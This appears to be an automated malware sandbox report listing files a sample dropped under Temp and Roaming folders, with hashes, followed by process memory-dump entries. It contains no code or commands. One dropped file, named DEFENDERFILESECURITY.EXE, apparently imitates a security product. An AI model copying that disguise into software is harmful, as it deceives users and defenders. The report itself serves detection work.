SHA256
1f1c42450a44e9cbd112572924d3ecd8da99c2ed848df0beb0c7c10c60faf85b

SHA512
4d2b8fb3978d55fe99a5068bb9b86a42d1a3a6f78fe006120e4c410adfff91cd2b028d06b852d806faeb01c004a308036902bbe30d3f8ce27fd17cfa10a6cdaf

Download Submit
C:\Users\Admin\AppData\Local\Temp\4bgciL2q05.exe

Filesize
5KB

MD5
3de17236a2d53166b92fa1dbe8f4530f

SHA1
a4505bd507e2697bea0a8c0da13b05967157e30e

SHA256
b5b9761b00396977a372866e93a0306115735be8bfb8b4ebb06b6e683bdb343b

SHA512
63959ac44b568e8a6da89297aa41d38e3a3d7d785dd84e6dc5d7b65fdd8d39c2a49f24fbdc9fcf587c17229885b32fc0b37cd559a25cc2c57f3564f0037a5bfb

Download Submit
C:\Users\Admin\AppData\Local\Temp\4bgciL2q05.exe

Filesize
5KB

MD5
3de17236a2d53166b92fa1dbe8f4530f

SHA1
a4505bd507e2697bea0a8c0da13b05967157e30e

SHA256
b5b9761b00396977a372866e93a0306115735be8bfb8b4ebb06b6e683bdb343b

SHA512
63959ac44b568e8a6da89297aa41d38e3a3d7d785dd84e6dc5d7b65fdd8d39c2a49f24fbdc9fcf587c17229885b32fc0b37cd559a25cc2c57f3564f0037a5bfb

Download Submit
C:\Users\Admin\AppData\Local\Temp\8wF2VXXp0G.exe

Filesize
5KB

MD5
80b5367dce5fa3438971148c591192bb

SHA1
e64e614bdc92464d237706a1ec8f16c4d030771a

SHA256
0de5d8b27608374949ef0271695ecab50c3b8384cfd875e2679b4a7a1772ac03

SHA512
0ec3553f437de1de9a3fc04013626cb3dc55e33ecdd26480383782f4b40c36119b985663a190c2ebdbf021b0252d27108a8c9a08df8adcd88153e3efbe5df1f3

Download Submit
C:\Users\Admin\AppData\Local\Temp\8wF2VXXp0G.exe

Filesize
5KB

MD5
80b5367dce5fa3438971148c591192bb

SHA1
e64e614bdc92464d237706a1ec8f16c4d030771a

SHA256
0de5d8b27608374949ef0271695ecab50c3b8384cfd875e2679b4a7a1772ac03

SHA512
0ec3553f437de1de9a3fc04013626cb3dc55e33ecdd26480383782f4b40c36119b985663a190c2ebdbf021b0252d27108a8c9a08df8adcd88153e3efbe5df1f3

Download Submit
C:\Users\Admin\AppData\Local\Temp\CuJy5ycumB.exe

Filesize
5KB

MD5
a43d70277fe90ecd3bc2da18108978f5

SHA1
a2104dd195d70b13f9c37977160df46045399848

SHA256
43f8501bcf8e196eeb57688b6dc5e12e431aee46ec86aa8643c50d91e952dfea

SHA512
3cd4da9c5b4c3de55b4bab1bfd2f41877eb5ed8263e98bc82533cb894a91acbb5d3b8fa94aa56d2ca4f6f44c8f595bae791bf8f3de458536c5afe4d63fd3ba54

Download Submit
C:\Users\Admin\AppData\Local\Temp\CuJy5ycumB.exe

Filesize
5KB

MD5
a43d70277fe90ecd3bc2da18108978f5

SHA1
a2104dd195d70b13f9c37977160df46045399848

SHA256
43f8501bcf8e196eeb57688b6dc5e12e431aee46ec86aa8643c50d91e952dfea

SHA512
3cd4da9c5b4c3de55b4bab1bfd2f41877eb5ed8263e98bc82533cb894a91acbb5d3b8fa94aa56d2ca4f6f44c8f595bae791bf8f3de458536c5afe4d63fd3ba54

Download Submit
C:\Users\Admin\AppData\Local\Temp\GzFtaFpoIp.exe

Filesize
5KB

MD5
f06d2b32fd1a26d08d0199b3e9942356

SHA1
545fb4409348a4786e06654b647c15dfbe473137

SHA256
279da621a31ae6331d05536c2bf5bab48290a22f276d50edc65aaa4f6d25abfa

SHA512
9b01f6c989ed324b61cd4a1ca39dc3c745190af71a5a72853b08a18b9ead454a3689ee553ef1cd31e7da478eda27712bd0a7666a4e9857a73c85118ebcfd64d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\GzFtaFpoIp.exe

Filesize
5KB

MD5
f06d2b32fd1a26d08d0199b3e9942356

SHA1
545fb4409348a4786e06654b647c15dfbe473137

SHA256
279da621a31ae6331d05536c2bf5bab48290a22f276d50edc65aaa4f6d25abfa

SHA512
9b01f6c989ed324b61cd4a1ca39dc3c745190af71a5a72853b08a18b9ead454a3689ee553ef1cd31e7da478eda27712bd0a7666a4e9857a73c85118ebcfd64d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\KOVSiCQjEa.exe

Filesize
5KB

MD5
1dc1539231b7746d2e09c65094bb7128

SHA1
1a5e8a3168c1eaa532525367af9ae019776a52eb

SHA256
33de7d8580428b84182a46b63b1afed575571b486e18a589fe3a09606ac49be5

SHA512
96b2afa6affd33bf5bb95b6115ef97a958d29b8d41b99f54ad7a50e4ef828847a3d91cad9a10db494b5d0efc98a1266d39c1b90b3394a0cd61db7abd4b92971c

Download Submit
C:\Users\Admin\AppData\Local\Temp\KOVSiCQjEa.exe

Filesize
5KB

MD5
1dc1539231b7746d2e09c65094bb7128

SHA1
1a5e8a3168c1eaa532525367af9ae019776a52eb

SHA256
33de7d8580428b84182a46b63b1afed575571b486e18a589fe3a09606ac49be5

SHA512
96b2afa6affd33bf5bb95b6115ef97a958d29b8d41b99f54ad7a50e4ef828847a3d91cad9a10db494b5d0efc98a1266d39c1b90b3394a0cd61db7abd4b92971c

Download Submit
C:\Users\Admin\AppData\Local\Temp\NIduwYgK0u.exe

Filesize
6KB

MD5
db926860befc9b51744143b33041df03

SHA1
8ce9692397678c639b0bd6c0767899fb2ea44b3d

SHA256
fa3a94cf93abf5261d419159d860362645117d9350633a1d66c2d09c3194dcdc

SHA512
371084f648ec894b0a3a9e80e51ad9880631b0ddc3675f3a4540927c2160973f513b1e7b1b2dcc98de0be813a2069c4356248949d5cea62e8bc26d019c93bc58

Download Submit
C:\Users\Admin\AppData\Local\Temp\NIduwYgK0u.exe

Filesize
6KB

MD5
db926860befc9b51744143b33041df03

SHA1
8ce9692397678c639b0bd6c0767899fb2ea44b3d

SHA256
fa3a94cf93abf5261d419159d860362645117d9350633a1d66c2d09c3194dcdc

SHA512
371084f648ec894b0a3a9e80e51ad9880631b0ddc3675f3a4540927c2160973f513b1e7b1b2dcc98de0be813a2069c4356248949d5cea62e8bc26d019c93bc58

Download Submit
C:\Users\Admin\AppData\Local\Temp\QbFMU9R2KB.exe

Filesize
5KB

MD5
f73f5600df63188edff60e13f7117613

SHA1
c748fcad3a400ad7ba3501dc280183120c62f0ce

SHA256
f31e5ac974ab655524881ddfef38d4ab869644f70bafb67e6f3b22ea625c8217

SHA512
660b45fa23c751d311904d924704904972504161f17c9e0ed24e81b2b1eb12ac35a4811e26400d7f7717e23aacafe394975cc3433aa67057222a349298800caa

Download Submit
C:\Users\Admin\AppData\Local\Temp\QbFMU9R2KB.exe

Filesize
5KB

MD5
f73f5600df63188edff60e13f7117613

SHA1
c748fcad3a400ad7ba3501dc280183120c62f0ce

SHA256
f31e5ac974ab655524881ddfef38d4ab869644f70bafb67e6f3b22ea625c8217

SHA512
660b45fa23c751d311904d924704904972504161f17c9e0ed24e81b2b1eb12ac35a4811e26400d7f7717e23aacafe394975cc3433aa67057222a349298800caa

Download Submit
C:\Users\Admin\AppData\Local\Temp\dSRkUrgMFv.exe

Filesize
6KB

MD5
5aad07833e9fa0d2accc84a739787910

SHA1
98f0f0811fb6343d0f107b3bbd668588374f281b

SHA256
e35c7638ecaf289213e644f8ace1f1cb39fcb4fcd513cc66c898ccafcbd3d601

SHA512
acb1fd547b21e6fbc1c58a5a3fe490b3ff36f74b0dcaf162eda6f742cb9287029dcf50a4bde06912cb8ebb8332a3aa1930b5b970e4c673f3c2c479e1623e9987

Download Submit
C:\Users\Admin\AppData\Local\Temp\dSRkUrgMFv.exe

Filesize
6KB

MD5
5aad07833e9fa0d2accc84a739787910

SHA1
98f0f0811fb6343d0f107b3bbd668588374f281b

SHA256
e35c7638ecaf289213e644f8ace1f1cb39fcb4fcd513cc66c898ccafcbd3d601

SHA512
acb1fd547b21e6fbc1c58a5a3fe490b3ff36f74b0dcaf162eda6f742cb9287029dcf50a4bde06912cb8ebb8332a3aa1930b5b970e4c673f3c2c479e1623e9987

Download Submit
C:\Users\Admin\AppData\Local\Temp\oLjOmZogsf.exe

Filesize
5KB

MD5
0afa034595bdcf7b9b990b083910f7a5

SHA1
9c9d01227016d43458c7567612a64f88df84c787

SHA256
c6dd505d02069b6b0452f51c165db53fbb6b80b4b48de19c083ab22ef98b2158

SHA512
4753057e45f2f03f9cab56f3b7864d2d3455f2549ebb7e6c9fcc8680f8a9e38568026e72694cebf288f3e63fc180b08e5d0fad0f3b1a74e5dc88612d4db6544a

Download Submit
C:\Users\Admin\AppData\Local\Temp\oLjOmZogsf.exe

Filesize
5KB

MD5
0afa034595bdcf7b9b990b083910f7a5

SHA1
9c9d01227016d43458c7567612a64f88df84c787

SHA256
c6dd505d02069b6b0452f51c165db53fbb6b80b4b48de19c083ab22ef98b2158

SHA512
4753057e45f2f03f9cab56f3b7864d2d3455f2549ebb7e6c9fcc8680f8a9e38568026e72694cebf288f3e63fc180b08e5d0fad0f3b1a74e5dc88612d4db6544a

Download Submit
C:\Users\Admin\AppData\Local\Temp\tWut9PTgX5.exe

Filesize
5KB

MD5
f80b025283792123fbae3410d70827a4

SHA1
fd26b4e8c853660b82511cd1cef63e702786a2b7

SHA256
67e9ff29fd11c622022e52fd44f4fc8bf316ea6a31346733f6acb52b3e73bd79

SHA512
c3adf6b49a08ece5efd8fab9bae8605c6dd942f2f513666d3ff5380b9b5d3645cb252bf1426e5bda576a839a18e38eca5fe04d60ad735b51beb191e6a1cc7e83

Download Submit
C:\Users\Admin\AppData\Local\Temp\tWut9PTgX5.exe

Filesize
5KB

MD5
f80b025283792123fbae3410d70827a4

SHA1
fd26b4e8c853660b82511cd1cef63e702786a2b7

SHA256
67e9ff29fd11c622022e52fd44f4fc8bf316ea6a31346733f6acb52b3e73bd79

SHA512
c3adf6b49a08ece5efd8fab9bae8605c6dd942f2f513666d3ff5380b9b5d3645cb252bf1426e5bda576a839a18e38eca5fe04d60ad735b51beb191e6a1cc7e83

Download Submit
C:\Users\Admin\AppData\Local\Temp\w47Z6QOWuW.exe

Filesize
5KB

MD5
9834c42388182be07380f7cc078607c2

SHA1
c2953ef169d0abe1815298064aba8415588e3419

SHA256
2d46f4b1468f643541f7e92c90374e720bde3c7fe28480404292e621373a9f71

SHA512
feff00f3cc2ded69a135d982266dab656d89556991af0ef5fd8902817bbf91443b4cdc2f662f086f077e5305f714abeb043a2c9f7334db5bf18cd33c05eb091a

Download Submit
C:\Users\Admin\AppData\Local\Temp\w47Z6QOWuW.exe

Filesize
5KB

MD5
9834c42388182be07380f7cc078607c2

SHA1
c2953ef169d0abe1815298064aba8415588e3419

SHA256
2d46f4b1468f643541f7e92c90374e720bde3c7fe28480404292e621373a9f71

SHA512
feff00f3cc2ded69a135d982266dab656d89556991af0ef5fd8902817bbf91443b4cdc2f662f086f077e5305f714abeb043a2c9f7334db5bf18cd33c05eb091a

Download Submit
C:\Users\Admin\AppData\Roaming\1.exe

Filesize
87KB

MD5
3c6ccbfe897915f0fe6bc34d193bf4a0

SHA1
6fe3161ee66e317889066a302474e511220939e7

SHA256
52bf11364e8430f4b271ebb29e2a55451543338be5b2a34e731ede58eef04241

SHA512
e0bf1fc11deacb24b5d5de4bcfc522057d1ca1b4866325356b2c9a1f009c6562eee0c0e602478b3639de4beff14997d59a3b428281d9111278544fc5e3199536

Download Submit
C:\Users\Admin\AppData\Roaming\1.exe

Filesize
87KB

MD5
3c6ccbfe897915f0fe6bc34d193bf4a0

SHA1
6fe3161ee66e317889066a302474e511220939e7

SHA256
52bf11364e8430f4b271ebb29e2a55451543338be5b2a34e731ede58eef04241

SHA512
e0bf1fc11deacb24b5d5de4bcfc522057d1ca1b4866325356b2c9a1f009c6562eee0c0e602478b3639de4beff14997d59a3b428281d9111278544fc5e3199536

Download Submit
C:\Users\Admin\AppData\Roaming\2.exe

Filesize
14.7MB

MD5
6f6b812c166e53dc9b52b9b60e5ed369

SHA1
e60cf5e718c030182dec6f7fbbbbf884fcdfcca1

SHA256
ffead35df6bc101476d76393619fe0a06a57d93927417d9bcf814d2e4c6b36a0

SHA512
8e8e5fe21f4b08a053255beb0f4e55f03e0114e7fa2117b8ef8320e7fd88275771394cd9a7e4237793b370f980ff7ed45a6ff78d3d97d59cd077868e7602f4b9

Download Submit
C:\Users\Admin\AppData\Roaming\2.exe

Filesize
14.7MB

MD5
6f6b812c166e53dc9b52b9b60e5ed369

SHA1
e60cf5e718c030182dec6f7fbbbbf884fcdfcca1

SHA256
ffead35df6bc101476d76393619fe0a06a57d93927417d9bcf814d2e4c6b36a0

SHA512
8e8e5fe21f4b08a053255beb0f4e55f03e0114e7fa2117b8ef8320e7fd88275771394cd9a7e4237793b370f980ff7ed45a6ff78d3d97d59cd077868e7602f4b9

Download Submit
C:\Users\Admin\AppData\Roaming\2.exe

Filesize
14.7MB

MD5
6f6b812c166e53dc9b52b9b60e5ed369

SHA1
e60cf5e718c030182dec6f7fbbbbf884fcdfcca1

SHA256
ffead35df6bc101476d76393619fe0a06a57d93927417d9bcf814d2e4c6b36a0

SHA512
8e8e5fe21f4b08a053255beb0f4e55f03e0114e7fa2117b8ef8320e7fd88275771394cd9a7e4237793b370f980ff7ed45a6ff78d3d97d59cd077868e7602f4b9

Download Submit
C:\Users\Admin\AppData\Roaming\3.exe

Filesize
87KB

MD5
ca699117112a173ca7b289f1baf6c3c0

SHA1
862f227d4fa0b4de892006d7fe19e610e9f1a676

SHA256
db805d5ac09ea9d18a3016d4c70cbb52087604fe5ad23fd8043399c970c0c8a6

SHA512
d9f82f6e18ce2eb624a5ee1e20618318fde7ffdcff834d9c0291f4971bd72ce9b7f5108bf45f11ceed4d1f526bad4842913e833a25e3d99a3235d6f87b4d2620

Download Submit
C:\Users\Admin\AppData\Roaming\3.exe

Filesize
87KB

MD5
ca699117112a173ca7b289f1baf6c3c0

SHA1
862f227d4fa0b4de892006d7fe19e610e9f1a676

SHA256
db805d5ac09ea9d18a3016d4c70cbb52087604fe5ad23fd8043399c970c0c8a6

SHA512
d9f82f6e18ce2eb624a5ee1e20618318fde7ffdcff834d9c0291f4971bd72ce9b7f5108bf45f11ceed4d1f526bad4842913e833a25e3d99a3235d6f87b4d2620

Download Submit
C:\Users\Admin\AppData\Roaming\4.exe

Filesize
1006KB

MD5
f87fd290c2d08ede25d6a8def9657c07

SHA1
930e7f35e0d5a43faf19ad75bc41c7efce914a17

SHA256
a9b2a465ca8b372a9067d8cc4f6ce6404e2501177f5499d343ca88c0bc4665cf

SHA512
0093b13ab44468c67aceadb04d4cdbbb7486737e8aa0a6aff8e662c308100a6d3bdf4f1cdc630e00d701fa8ec79ed89a8d31ed325bf2c6f05797742aae09db07

Download Submit
C:\Users\Admin\AppData\Roaming\4.exe

Filesize
1006KB

MD5
f87fd290c2d08ede25d6a8def9657c07

SHA1
930e7f35e0d5a43faf19ad75bc41c7efce914a17

SHA256
a9b2a465ca8b372a9067d8cc4f6ce6404e2501177f5499d343ca88c0bc4665cf

SHA512
0093b13ab44468c67aceadb04d4cdbbb7486737e8aa0a6aff8e662c308100a6d3bdf4f1cdc630e00d701fa8ec79ed89a8d31ed325bf2c6f05797742aae09db07

Download Submit
C:\Users\Admin\AppData\Roaming\5.exe

Filesize
4.2MB

MD5
b60e44033994d1fde9a4b6f1338bfa04

SHA1
7f2cd8091276040ca011174269112099ec3e9bef

SHA256
baaa098832eb5790a1fabfdc6284eecffdd74a914ea1312c0f413cc5bb814a7e

SHA512
a8776d7ce2bffa25cefe789bf8f5a4b5b0b81ef53cd0c783ded1be9ee0f976c6c2a3bd41a4d9c05eb15910051d3cfe490c6390b7029d370ad71487c88416c574

Download Submit
C:\Users\Admin\AppData\Roaming\5.exe

Filesize
4.2MB

MD5
b60e44033994d1fde9a4b6f1338bfa04

SHA1
7f2cd8091276040ca011174269112099ec3e9bef

SHA256
baaa098832eb5790a1fabfdc6284eecffdd74a914ea1312c0f413cc5bb814a7e

SHA512
a8776d7ce2bffa25cefe789bf8f5a4b5b0b81ef53cd0c783ded1be9ee0f976c6c2a3bd41a4d9c05eb15910051d3cfe490c6390b7029d370ad71487c88416c574

Download Submit
C:\Users\Admin\AppData\Roaming\6.exe

Filesize
14.7MB

MD5
533f876556e02dec453f6fa4c2536967

SHA1
a4abdc1e4b26623e2be6c3715c1a75a5a6e2c397

SHA256
cd2c63e16f4c1e79e7763c278146acae54dca752c25ad46d47167f69d70d714a

SHA512
3935d864faa3e7c32e6a4fa2a7ab01a9ae2c103531a73df1a6500ce78321f86623e3e9d7be74535ff0bd09382462915239f263c9466cb8ef6437c48a55fcb47a

Download Submit
C:\Users\Admin\AppData\Roaming\6.exe

Filesize
14.7MB

MD5
533f876556e02dec453f6fa4c2536967

SHA1
a4abdc1e4b26623e2be6c3715c1a75a5a6e2c397

SHA256
cd2c63e16f4c1e79e7763c278146acae54dca752c25ad46d47167f69d70d714a

SHA512
3935d864faa3e7c32e6a4fa2a7ab01a9ae2c103531a73df1a6500ce78321f86623e3e9d7be74535ff0bd09382462915239f263c9466cb8ef6437c48a55fcb47a

Download Submit
C:\Users\Admin\AppData\Roaming\7.exe

Filesize
87KB

MD5
70488131ff53f7f73f351f27f86a10ce

SHA1
fce5bc2ff5d38c068de759868a6ddfb023cb3ca8

SHA256
308f16cf7000655a28f21e6d159ac68740d6c8437b2a83baaa563912a2bf7a19

SHA512
127f8e35ae15360fe1ea35523adc29ee28ee6e7bb1b66fb5eebcbb008c3a6a7cd99e9d0ad1f253c6a24a0183d99513675526ec5e0265390377e5f90cc5073197

Download Submit
C:\Users\Admin\AppData\Roaming\7.exe

Filesize
87KB

MD5
70488131ff53f7f73f351f27f86a10ce

SHA1
fce5bc2ff5d38c068de759868a6ddfb023cb3ca8

SHA256
308f16cf7000655a28f21e6d159ac68740d6c8437b2a83baaa563912a2bf7a19

SHA512
127f8e35ae15360fe1ea35523adc29ee28ee6e7bb1b66fb5eebcbb008c3a6a7cd99e9d0ad1f253c6a24a0183d99513675526ec5e0265390377e5f90cc5073197

Download Submit
C:\Users\Admin\AppData\Roaming\8.exe

Filesize
14.7MB

MD5
2cbd5d9d43c5c49f0580975e9e620808

SHA1
17e209b6d6c66882ed78a40d7e0d211760b489a0

SHA256
399a0e77326dc484fa92fd5f95f2dbd89866dfd4e7e80661634a9a83f0652403

SHA512
26e06d3d3b4f8d1198f483e2485ee107782c7f5b70ddb4d48dd84c9ef81029af316ad3a184c90921c6f1188f92d88b9fd6a152eaba5648a03bfbdea589202812

Download Submit
C:\Users\Admin\AppData\Roaming\8.exe

Filesize
14.7MB

MD5
2cbd5d9d43c5c49f0580975e9e620808

SHA1
17e209b6d6c66882ed78a40d7e0d211760b489a0

SHA256
399a0e77326dc484fa92fd5f95f2dbd89866dfd4e7e80661634a9a83f0652403

SHA512
26e06d3d3b4f8d1198f483e2485ee107782c7f5b70ddb4d48dd84c9ef81029af316ad3a184c90921c6f1188f92d88b9fd6a152eaba5648a03bfbdea589202812

Download Submit
C:\Users\Admin\AppData\Roaming\9.exe

Filesize
801KB

MD5
7359c3fed4aadbd6890b76ad9e573c24

SHA1
61d7bfc80a6b05473bd31ccc2f482a44cbb042f2

SHA256
07cb3ebc61269149d8bf71545abf578178b73ff376db381de8953abe3fd34ca4

SHA512
64d89fe6b82a70668bca194ba0e8b8c7c048009b6da0f722a0ec6cda662bb6f7d263f0b559b3ebfaf78f4d89f0d37f8b2a17dda8551d0aa95d01ddd5f0758b8c

Download Submit
C:\Users\Admin\AppData\Roaming\9.exe

Filesize
801KB

MD5
7359c3fed4aadbd6890b76ad9e573c24

SHA1
61d7bfc80a6b05473bd31ccc2f482a44cbb042f2

SHA256
07cb3ebc61269149d8bf71545abf578178b73ff376db381de8953abe3fd34ca4

SHA512
64d89fe6b82a70668bca194ba0e8b8c7c048009b6da0f722a0ec6cda662bb6f7d263f0b559b3ebfaf78f4d89f0d37f8b2a17dda8551d0aa95d01ddd5f0758b8c

Download Submit
C:\Users\Admin\AppData\Roaming\DEFENDERFILESECURITY.EXE

Filesize
532KB

MD5
84e6aa267c6970d2d777d60840390102

SHA1
c97e555e98c5bec69bcad9607cf0153ff827a141

SHA256
69f7c84e27083e5af30a91c797c6c1d5b694c2926ebb8a9edb7c6ed8e4c3cb3c

SHA512
47184ca58f7358bad24acbcfc2038a510a1ae55b90b927d79a98df13c0e911daeaadb1100f0dc112370fe61bf6264fb9ff214d143d17af659e0bd1ba16f0cecc

Download Submit
C:\Users\Admin\AppData\Roaming\DEFENDERFILESECURITY.EXE

Filesize
532KB

MD5
84e6aa267c6970d2d777d60840390102

SHA1
c97e555e98c5bec69bcad9607cf0153ff827a141

SHA256
69f7c84e27083e5af30a91c797c6c1d5b694c2926ebb8a9edb7c6ed8e4c3cb3c

SHA512
47184ca58f7358bad24acbcfc2038a510a1ae55b90b927d79a98df13c0e911daeaadb1100f0dc112370fe61bf6264fb9ff214d143d17af659e0bd1ba16f0cecc

Download Submit
memory/360-240-0x00007FFAB6AE0000-0x00007FFAB75A1000-memory.dmp

Filesize
10.8MB

Download
memory/760-264-0x0000000006710000-0x000000000672E000-memory.dmp

Filesize
120KB

Download
memory/760-274-0x0000000007A20000-0x0000000007A3A000-memory.dmp

Filesize
104KB

Download
memory/760-260-0x0000000005770000-0x0000000005792000-memory.dmp

Filesize
136KB

Download
memory/760-270-0x0000000006CC0000-0x0000000006CDE000-memory.dmp

Filesize
120KB

Download
memory/760-269-0x00000000703A0000-0x00000000703EC000-memory.dmp

Filesize
304KB

Download
memory/760-273-0x0000000008060000-0x00000000086DA000-memory.dmp

Filesize
6.5MB

Download
memory/760-254-0x0000000005840000-0x0000000005E68000-memory.dmp

Filesize
6.2MB

Download
memory/760-275-0x0000000007A90000-0x0000000007A9A000-memory.dmp

Filesize
40KB

Download
memory/760-268-0x0000000006CE0000-0x0000000006D12000-memory.dmp

Filesize
200KB

Download
memory/760-252-0x0000000005140000-0x0000000005176000-memory.dmp

Filesize
216KB

Download
memory/760-262-0x00000000060D0000-0x0000000006136000-memory.dmp

Filesize
408KB

Download
memory/760-261-0x0000000006060000-0x00000000060C6000-memory.dmp

Filesize
408KB

Download
memory/1056-242-0x00007FFAB6AE0000-0x00007FFAB75A1000-memory.dmp

Filesize
10.8MB

Download
memory/1072-224-0x00000000007F0000-0x00000000007F8000-memory.dmp

Filesize
32KB

Download
memory/1072-238-0x00007FFAB6AE0000-0x00007FFAB75A1000-memory.dmp

Filesize
10.8MB

Download
memory/1188-266-0x00007FFAB6AE0000-0x00007FFAB75A1000-memory.dmp

Filesize
10.8MB

Download
memory/1188-210-0x00007FFAB6AE0000-0x00007FFAB75A1000-memory.dmp

Filesize
10.8MB

Download
memory/1456-174-0x00007FFAB6AE0000-0x00007FFAB75A1000-memory.dmp

Filesize
10.8MB

Download
memory/1456-163-0x00007FFAB6AE0000-0x00007FFAB75A1000-memory.dmp

Filesize
10.8MB

Download
memory/1456-161-0x0000000000920000-0x0000000000928000-memory.dmp

Filesize
32KB

Download
memory/1592-229-0x00007FFAB6AE0000-0x00007FFAB75A1000-memory.dmp

Filesize
10.8MB

Download
memory/1592-271-0x00007FFAB6AE0000-0x00007FFAB75A1000-memory.dmp

Filesize
10.8MB

Download
memory/1604-186-0x00007FFAB6AE0000-0x00007FFAB75A1000-memory.dmp

Filesize
10.8MB

Download
memory/1604-265-0x00007FFAB6AE0000-0x00007FFAB75A1000-memory.dmp

Filesize
10.8MB

Download
memory/1744-184-0x0000000000E30000-0x0000000000E38000-memory.dmp

Filesize
32KB

Download
memory/1744-198-0x00007FFAB6AE0000-0x00007FFAB75A1000-memory.dmp

Filesize
10.8MB

Download
memory/1744-188-0x00007FFAB6AE0000-0x00007FFAB75A1000-memory.dmp

Filesize
10.8MB

Download
memory/1848-272-0x00007FFAB6AE0000-0x00007FFAB75A1000-memory.dmp

Filesize
10.8MB

Download
memory/1848-226-0x00007FFAB6AE0000-0x00007FFAB75A1000-memory.dmp

Filesize
10.8MB

Download
memory/1948-241-0x00007FFAB6AE0000-0x00007FFAB75A1000-memory.dmp

Filesize
10.8MB

Download
memory/2252-259-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/2300-211-0x0000000000920000-0x0000000000928000-memory.dmp

Filesize
32KB

Download
memory/2300-233-0x00007FFAB6AE0000-0x00007FFAB75A1000-memory.dmp

Filesize
10.8MB

Download
memory/2316-193-0x00000000008A0000-0x00000000008A8000-memory.dmp

Filesize
32KB

Download
memory/2316-207-0x00007FFAB6AE0000-0x00007FFAB75A1000-memory.dmp

Filesize
10.8MB

Download
memory/2524-143-0x0000000000400000-0x0000000000497000-memory.dmp

Filesize
604KB

Download
memory/2524-139-0x0000000000400000-0x0000000000497000-memory.dmp

Filesize
604KB

Download
memory/2524-137-0x0000000000400000-0x0000000000497000-memory.dmp

Filesize
604KB

Download
memory/2524-136-0x0000000000400000-0x0000000000497000-memory.dmp

Filesize
604KB

Download
memory/2524-135-0x0000000000400000-0x0000000000497000-memory.dmp

Filesize
604KB

Download
memory/2852-348-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/2876-196-0x00007FFAB6AE0000-0x00007FFAB75A1000-memory.dmp

Filesize
10.8MB

Download
memory/2876-182-0x0000000000F90000-0x0000000000F98000-memory.dmp

Filesize
32KB

Download
memory/3100-232-0x0000000000F20000-0x0000000000F28000-memory.dmp

Filesize
32KB

Download
memory/3100-239-0x00007FFAB6AE0000-0x00007FFAB75A1000-memory.dmp

Filesize
10.8MB

Download
memory/3216-243-0x00007FFAB6AE0000-0x00007FFAB75A1000-memory.dmp

Filesize
10.8MB

Download
memory/3244-150-0x00007FF6DF800000-0x00007FF6DF963000-memory.dmp

Filesize
1.4MB

Download
memory/3244-219-0x00007FF6DF800000-0x00007FF6DF963000-memory.dmp

Filesize
1.4MB

Download
memory/3268-202-0x0000000000600000-0x0000000000608000-memory.dmp

Filesize
32KB

Download
memory/3268-220-0x00007FFAB6AE0000-0x00007FFAB75A1000-memory.dmp

Filesize
10.8MB

Download
memory/3268-204-0x00007FFAB6AE0000-0x00007FFAB75A1000-memory.dmp

Filesize
10.8MB

Download
memory/3676-164-0x00007FFAB6AE0000-0x00007FFAB75A1000-memory.dmp

Filesize
10.8MB

Download
memory/3676-155-0x0000000000DE0000-0x0000000000DE8000-memory.dmp

Filesize
32KB

Download
memory/3900-235-0x00007FFAB6AE0000-0x00007FFAB75A1000-memory.dmp

Filesize
10.8MB

Download
memory/4016-132-0x0000000000440000-0x00000000004EA000-memory.dmp

Filesize
680KB

Download
memory/4064-234-0x00007FFAB6AE0000-0x00007FFAB75A1000-memory.dmp

Filesize
10.8MB

Download
memory/4064-217-0x00000000006A0000-0x00000000006A8000-memory.dmp

Filesize
32KB

Download
memory/4228-167-0x0000013EDF150000-0x0000013EDF172000-memory.dmp

Filesize
136KB

Download
memory/4228-166-0x00007FFAB6AE0000-0x00007FFAB75A1000-memory.dmp

Filesize
10.8MB

Download
memory/4228-249-0x00007FFAB6AE0000-0x00007FFAB75A1000-memory.dmp

Filesize
10.8MB

Download
memory/4300-247-0x0000000000EE0000-0x0000000000EFC000-memory.dmp

Filesize
112KB

Download
memory/4300-248-0x0000000005D40000-0x00000000062E4000-memory.dmp

Filesize
5.6MB

Download
memory/4404-171-0x00000000003F0000-0x00000000003F8000-memory.dmp

Filesize
32KB

Download
memory/4404-187-0x00007FFAB6AE0000-0x00007FFAB75A1000-memory.dmp

Filesize
10.8MB

Download
memory/4496-340-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/4672-212-0x00007FFAB6AE0000-0x00007FFAB75A1000-memory.dmp

Filesize
10.8MB

Download
memory/4672-267-0x00007FFAB6AE0000-0x00007FFAB75A1000-memory.dmp

Filesize
10.8MB

Download
memory/4972-144-0x00007FF705ED0000-0x00007FF70602F000-memory.dmp

Filesize
1.4MB

Download
memory/4972-146-0x00007FF705ED0000-0x00007FF70602F000-memory.dmp

Filesize
1.4MB

Download
memory/4976-302-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download